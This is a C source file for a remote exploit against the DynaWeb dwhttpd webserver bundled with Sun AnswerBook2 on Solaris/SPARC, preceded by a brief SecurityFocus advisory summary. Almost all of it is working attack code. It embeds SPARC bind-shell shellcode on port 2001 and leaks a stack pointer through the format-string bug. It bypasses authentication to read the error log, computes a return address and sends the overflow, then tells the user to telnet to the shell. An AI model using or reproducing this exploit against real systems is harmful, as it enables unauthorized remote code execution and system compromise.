1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508 | // source: https://www.securityfocus.com/bid/5384/info
Inso DynaWeb webserver, dwhttpd, is used as a subcomponent in products such as Sun's AnswerBook2, which is shipped as part of the Solaris operating environment.
The dwhttpd webserver is prone to a remotely exploitable format-string vulnerability that occurs when logging requests for files that do not exist. Exploits may allow attacker-supplied code supplied to run with the privileges of the dwhttpd.
Note that a vulnerability described in Bugtraq ID 5583 allows for unauthenticated remote attackers to view the logfile. Attackers may exploit that vulnerability to more easily exploit this issue successfully and automatically.
/*
* Solaris/SPARC AnswerBook2 / DynaWeb HTTPD remote exploit
*
* Exploits a format string vulnerability in dwhttpd to overflow the
* destination string passed to vsprintf(3S) in nsapi_log_error().
* The constructed format string uses a large field width, which when
* interpreted by vsprintf(), overflows the destination string and
* places code on the stack. Using a carefully crafted request and
* the format string bug, it bypasses authentication to retrieve a
* pointer to the stack out of the dwhttpd error log. Using this
* pointer, we calculate the exact location of our shellcode.
* The shellcode included binds /bin/sh to port 2001.
*
* I found this bug on 2000-09-22, but kept poking at exploit over
* next year or so.
*
* -ghandi <ghandi@mindless.com>, 2001-07-08
*/
/* XXX: Doesn't work from an intel (little-endian) machine. */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <strings.h>
#include <stdlib.h>
#include <netdb.h>
char bindsh_sparc[] =
"\xa0\x23\xa0\x10" /* sub %sp, 16, %l0 */
"\xae\x23\x80\x10" /* sub %sp, %l0, %l7 */
"\xee\x23\xbf\xec" /* st %l7, [%sp - 20] */
"\x90\x25\xe0\x0e" /* sub %l7, 14, %o0 */
"\x92\x25\xe0\x0e" /* sub %l7, 14, %o1 */
"\x94\x1c\x40\x11" /* xor %l1, %l1, %o2 */
"\x96\x1c\x40\x11" /* xor %l1, %l1, %o3 */
"\x98\x25\xe0\x0f" /* sub %l7, 15, %o4 */
"\x82\x05\xe0\xd6" /* add %l7, 214, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\xa4\x1a\x80\x08" /* xor %o2, %o0, %l2 */
"\xd2\x33\xbf\xf0" /* sth %o1, [%sp - 16] */
"\xac\x10\x27\xd1" /* mov 2001, %l6 */
"\xec\x33\xbf\xf2" /* sth %l6, [%sp - 14] */
"\xc0\x23\xbf\xf4" /* st %g0, [%sp - 12] */
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */
"\x92\x1a\xc0\x10" /* xor %o3, %l0, %o1 */
"\x94\x1a\xc0\x17" /* xor %o3, %l7, %o2 */
"\x82\x05\xe0\xd8" /* add %l7, 216, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */
"\x92\x25\xe0\x0b" /* sub %l7, 11, %o1 */
"\x82\x05\xe0\xd9" /* add %l7, 217, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1a\xc0\x12" /* xor %o3, %l2, %o0 */
"\x92\x1a\xc0\x10" /* xor %o3, %l0, %o1 */
"\x94\x23\xa0\x14" /* sub %sp, 20, %o2 */
"\x82\x05\xe0\xda" /* add %l7, 218, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\xa6\x1a\xc0\x08" /* xor %o3, %o0, %l3 */
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */
"\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */
"\x82\x05\xe0\x2e" /* add %l7, 46, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */
"\x94\x02\xe0\x01" /* add %o3, 1, %o2 */
"\x82\x05\xe0\x2e" /* add %l7, 46, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1a\xc0\x13" /* xor %o3, %l3, %o0 */
"\x92\x25\xe0\x07" /* sub %l7, 7, %o1 */
"\x94\x02\xe0\x02" /* add %o3, 2, %o2 */
"\x82\x05\xe0\x2e" /* add %l7, 46, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */
"\x82\x02\xe0\x17" /* add %o3, 23, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f626800), %l0 */
"\xa0\x14\x21\x6e" /* or %l0, 0x16e, %l0 ! 0x2f62696e */
"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800), %l1 */
"\x90\x23\xa0\x10" /* sub %sp, 16, %o0 */
"\x92\x23\xa0\x08" /* sub %sp, 8, %o1 */
"\x94\x1b\x80\x0e" /* xor %sp, %sp, %o2 */
"\xe0\x3b\xbf\xf0" /* std %l0, [%sp - 16] */
"\xd0\x23\xbf\xf8" /* st %o0, [%sp - 8] */
"\xc0\x23\xbf\xfc" /* st %g0, [%sp - 4] */
"\x82\x02\xe0\x3b" /* add %o3, 59, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
"\x90\x1b\x80\x0e" /* xor %sp, %sp, %o0 */
"\x82\x02\xe0\x01" /* add %o3, 1, %g1 */
"\x91\xd0\x38\x08" /* ta 0x8 */
;
typedef struct {
char* version; /* dwhttpd version string */
int ptr_offset; /* Distance between stack pointer and '/' */
int align; /* Double-word alignment padding, if any */
} dwhttpd_t;
typedef struct {
char* host; /* Target host */
int port; /* dwhttpd port (usually 8888) */
unsigned long saved_fp; /* Saved frame pointer */
unsigned long saved_pc; /* Saved program counter */
char* code; /* Port binding code */
char* recon; /* Reconaissance request string */
dwhttpd_t* dwhttpd; /* version specific exploit parameters */
} target_t;
/*
* Default target version parameters
*/
dwhttpd_t dwhttpds[] = {
{ "dwhttpd/4.0.2a7a", 4779, 0 }, /* 1.2, Solaris_7 */
{ "dwhttpd/4.1a6", 4779, 0 }, /* 1.4, 1.4.1, 1.4.2 */
{ NULL, 0, 0 }
};
char* dwhttpd_hstrerror(int);
int dwhttpd_get(target_t*, char*);
int dwhttpd_recon(target_t*);
int dwhttpd_get_ptr(target_t*);
int dwhttpd_check_address(target_t*);
char* dwhttpd_munge(unsigned long);
int dwhttpd_exploit(target_t*);
int main(int argc, char* argv[])
{
char c;
int recon = 1, exploit = 1;
target_t target = { 0, 8888, 0, 0, bindsh_sparc, 0, &dwhttpds[1]};
while ((c = getopt(argc, argv, "tr:d:")) != EOF) {
switch (c) {
case 'd':
target.dwhttpd = &dwhttpds[atoi(optarg)];
break;
case 't':
exploit = 0;
break;
case 'r':
recon = 0;
target.saved_pc = strtoul(optarg, NULL, 0);
target.saved_fp = target.saved_pc - 32;
break;
default:
fprintf(stderr, "unknown flag, read the usage this
time.\n");
return -1;
}
}
if (!argv[optind]) {
fprintf(stderr, "usage: %s [[-t] | [-r return address]]
<hostname>\n"
" -t\tonly calculate return address\n"
" -r ret\tUse this return address\n",
argv[0]);
return -1;
}
target.host = strdup(argv[optind]);
setvbuf(stdout, NULL, _IONBF, 0);
if (recon) {
/*
* Send the reconnaissance request to get a pointer to the stack
*/
printf("==> Sending reconnaissance request...\t\t\t");
if (dwhttpd_recon(&target)) {
char* msg;
if (errno)
msg = strerror(errno);
else
msg = dwhttpd_hstrerror(h_errno);
fprintf(stderr, "\nError sending reconnaissance request:
%s\n",
msg);
return -1;
}
printf("%s\n", target.dwhttpd->version);
/*
* Retrieve the stack pointer from the error log and calculate
our
* return address.
*/
printf("==> Calculating return address from error log...\t");
if (dwhttpd_get_ptr(&target)) {
fprintf(stderr, "\nError retrieving error log.\n");
return -1;
}
printf("0x%x\n", (unsigned int)target.saved_pc);
}
if (exploit) {
/*
* Use the format string to overflow the buffer and jump into
our
* shellcode. Use %i7 - 24 as our %fp to give our shellcode
* some scratch space on the stack.
*/
printf("==> Attempting to exploit...\t\t\t\t");
dwhttpd_exploit(&target);
printf("done.\n");
/*
* Hope it works.
*/
printf("==> Telnet to port 2001.\n");
}
return 0;
}
/*
* Send a request that exploits the format string bug to print out a
* pointer to the stack to the dwhttpd error log delimited by
* asterisks for easy parsing. While we're there, retrieve the
* dwhttpd version. Return 0 if the dwhttpd version was recognized,
* -1 otherwise.
*/
int dwhttpd_recon(target_t* target)
{
int fd, i;
FILE* f;
char line[4096];
char* dwhttpd_version = NULL;
sprintf(line, "/");
for (i = 0; i < 219; i++)
strcat(line, "%p");
strcat(line, "*%p*");
if ((fd = dwhttpd_get(target, line)) < 0) {
return -1;
}
f = fdopen(fd, "r");
while ((fgets(line, 4096, f)) != NULL) {
if ((strncmp(line, "Server: ", 8)) == 0) {
if (strtok(line, " \r\n\t")) {
char* server = strtok(NULL, " \r\n\t");
if (server)
dwhttpd_version = strdup(server);
}
}
}
fclose(f);
for (i = 0; dwhttpds[i].version ; i++) {
if (!strcmp(dwhttpd_version, dwhttpds[i].version)) {
target->dwhttpd = &dwhttpds[i];
return 0;
}
}
errno = ENOENT;
return -1;
}
/*
* Bypass Ab2Admin to retrieve the error log and search for our stack
* pointer (from dwhttpd_recon). Our code will be at a version
* dependent offset above that pointer, use that as our return address
* value.
*/
int dwhttpd_get_ptr(target_t* target)
{
int fd;
FILE* f;
char line[4096];
char* ptr = NULL;
char* request =
"/ab2/@AdminViewError";
if ((fd = dwhttpd_get(target, request)) < 0) {
fprintf(stderr, "http error: %s\n", strerror(errno));
return -1;
}
f = fdopen(fd, "r");
while ((fgets(line, 4096, f)) != NULL) {
char* str = NULL;
if (strtok(line, "*")) {
str = strtok(NULL, "*");
if (str) {
if (ptr) free(ptr);
ptr = strdup(str);
}
}
}
fclose(f);
/*
* Add a different offset to our pointer, depending on the version
* of dwhttpd. Use this as our target's saved program counter and
* to calculate the saved frame pointer.
*/
if (ptr) {
unsigned int ulptr;
if ((ulptr = strtoul(ptr, NULL, 16)) == 0) {
return -1;
}
target->saved_pc = ulptr + target->dwhttpd->ptr_offset;
target->saved_fp = target->saved_pc - 32;
return 0;
}
else {
errno = ENOENT;
return -1;
}
}
/*
* Check for double-word alignment and any character bytes in the
* address that will make the exploit not work. If there are any
* spaces or '?' characters in it, it will be parsed and truncated
* before the format string bug.
*/
int dwhttpd_check_address(target_t* target)
{
int i, j;
char buf[4];
unsigned long addrs[2];
addrs[0] = target->saved_fp;
addrs[1] = target->saved_pc;
for (i = 0; i < 2; i++) {
/* Check double-word alignment */
if (((addrs[i] >> 3) << 3) != addrs[i])
return 1 + i;
/* Check for parsed bytes */
memcpy(buf, &addrs[i], 4);
for (j = 0; j < 4; j++) {
if (buf[j] == '\0' || /* 0x00 */
buf[j] == ' ' || /* 0x20 */
buf[j] == '?') /* 0x3f */
return 3 + i;
}
}
return 0;
}
/* Munge an address to placement in format string. If the string has
* a 0x20 byte in it, it will be replaced by a format trick to print
* a space. If there are any 0x3e ('?') or 0x00 ('\0') bytes, we
* bail.
*/
char* dwhttpd_munge(unsigned long address)
{
int i;
char* str = malloc(29);
for (i = 0; i < 4; i++) {
char c[2];
c[0] = ((char*)&address)[i];
c[1] = '\0';
if (c[0] == ' ')
/* Print zero characters from the second string argument,
* space padded to one character. (=> ' ' if arg != NULL)
*/
strcat(str, "%2$1.0s");
else if (c[0] == '?') {
free(str);
return NULL;
}
else if (c[0] == '\0') {
free(str);
return NULL;
}
else
strcat(str, c);
}
return str;
}
/*
* Send the exploit request using the calculated stack pointer (%fp
* before the 'restore') and return address. Because we can can
* calculate the exact address from the recon request, we don't need
* many NOPs, so we can have up to 4000 bytes of shellcode.
*/
int dwhttpd_exploit(target_t* target)
{
int i, n, fd;
char request[4065];
char filler[65] = "\0";
unsigned long saved_fp, saved_pc;
char *saved_fp_str, *saved_pc_str;
/* A small NOP filler */
for (i = 0; i < 8; i++)
strcat(filler, "\x21\x0b\xd8\x9a");
/* Add space for "/%.4076[4 <= n <=28 chars][4 <= n <=28 chars]" */
target->saved_fp += 32;
target->saved_pc += 32;
/* Check and ensure double-word alignment */
if (((target->saved_fp >> 3) << 3) != target->saved_fp)
saved_fp = ((target->saved_fp >> 3) << 3);
if (((target->saved_pc >> 3) << 3) != target->saved_pc)
saved_pc = ((target->saved_pc >> 3) << 3);
/* Munge addresses for passing through parsing code */
if ((saved_fp_str = dwhttpd_munge(saved_fp)) == NULL) {
fprintf(stderr, "Couldn't munge %%fp = 0x%lx\n", saved_fp);
return 0;
}
if ((saved_pc_str = dwhttpd_munge(saved_pc)) == NULL) {
fprintf(stderr, "Couldn't munge %%i7 = 0x%lx\n", saved_pc);
return 0;
}
/* Lock */
snprintf(request, 4065, "/%%.4072x%.28s%.28s%.64s%.4000s",
saved_fp_str, saved_pc_str, filler, target->code);
/* And Load */
if ((fd = dwhttpd_get(target, request)) < 0) {
fprintf(stderr, "http error: %s\n", strerror(errno));
return 0;
}
close(fd);
return n;
}
/*
* Connect to the specified server and perform a GET request for the
* specified file. Returns the connected socket file descriptor or -1
* if an error occured.
*/
int dwhttpd_get(target_t* target, char* file) {
int sock, l, n = 4080;
struct sockaddr_in sa;
struct hostent* he;
size_t salen = sizeof(struct sockaddr);
char buf[4080];
if ((he = gethostbyname(target->host)) == NULL) {
return -1;
}
sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&sa, sizeof(struct sockaddr));
sa.sin_family = AF_INET;
memcpy(&sa.sin_addr, he->h_addr_list[0], he->h_length);
sa.sin_port = htons(target->port);
if (connect(sock, (struct sockaddr*)&sa, salen) < 0) {
return -1;
}
if ((l = snprintf(buf, n, "GET %s HTTP/1.0\r\n\r\n", file)) > n) {
fprintf(stderr, "http_get: Request too long\n");
errno = E2BIG;
return -1;
}
if ((n = send(sock, buf, l, 0)) < 0) {
perror("send");
return -1;
}
return sock;
}
char* dwhttpd_hstrerror(int err) {
char* msg;
switch (h_errno) {
case HOST_NOT_FOUND:
msg = "Host not found";
break;
case NO_DATA:
msg = "No data";
break;
case NO_RECOVERY:
msg = "No recovery";
break;
case TRY_AGAIN:
msg = "Try again";
break;
}
return msg;
}
|
